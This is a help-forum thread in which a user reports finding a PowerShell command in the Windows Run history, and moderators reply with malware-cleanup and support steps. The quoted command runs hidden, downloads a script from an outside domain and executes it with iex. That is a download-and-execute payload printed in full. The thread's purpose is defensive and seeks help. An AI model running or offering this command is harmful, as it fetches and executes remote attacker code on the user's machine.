Found a weird command in Run program

I just got out of bed and accidentally opened the Window + R command this is what I found

COMMAND:

powershell.exe -W Hidden -command $url = 'https://finalsteptogo.com/uploads/tr14.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

The link leads to this and another link leads to a RAR file.

I was thinking if there's a way to resolve this problem, I currently have many important files saved

Answers

  • Flexx
    Flexx mod
    edited September 28

    That command is potentially malicious and can be used to download and execute a s.c.r.i.p.t from a remote URL without the user's knowledge. It is crucial to be very cautious with such commands. Try these steps:

    1. Open the Run dialog and execute the following commands one by one:
      • temp – Delete all the files in the folder.
      • %temp% – Delete all the files in the folder.
      • prefetch – Delete all the files in the folder.
    2. Run a full system scan with Bitdefender.
    3. Since these types of commands may be stored on your PC, use either CCleaner or BleachBit to remove recent command history.
    4. For the downloaded RAR file, upload it to VirusTotal.com and scan it.
    5. To ensure that the malicious command has also been removed from your registry, kindly use Malwarebytes ( https://www.malwarebytes.com/ ) and perform a full system scan.

    Regards

    Life happens, Coffee helps!

    Show your Attitude, when you reach that Altitude!

    Bitdefender Ultimate Security Plus (user)

  • Hello.

    I believe that this is a job for the antimalware team at Bitdefender.

    But, first scan (and disinfect, if needed) your PC with Bitdefender Rescue Environment:
    https://www.bitdefender.com/consumer/support/answer/29132/

    Restart your PC.

    Next, do the following steps:
    Take screenshot(s) of the issue,
    create a log file on your Windows device using Bitdefender Support Tool, by following these steps:
    https://www.bitdefender.com/consumer/support/answer/1733/

    and
    create a log file on your Windows device using BDsysLog, by following these steps:

    https://www.bitdefender.com/consumer/support/answer/1922/

    Next, contact Bitdefender Consumer Support by e-mail:

    https://www.bitdefender.com/consumer/support/help/

    with short description of the issue.
    After that, you will get an automated reply by the Bitdefender Customer Care Team, with your ticket number.
    Now, in reply to that automated reply, you can send the screenshot(s) you already took and the log files you already created in the first step.
    Since you are all done, just wait for the support engineers to investigate your issue and find a solution to fix the issue.
    Remember that the screenshot(s) and the log files will help a lot to the support engineers for better and faster investigation on your issue and finding a solution.
    NOTE: If any of the log file is larger than 25MB, you can upload the log file here:

    https://upload.bitdefender.net/

    After the upload is done, you will get a notification with the file's URL and then you can share the file's URL with the Bitdefender Consumer Support.
    Regards.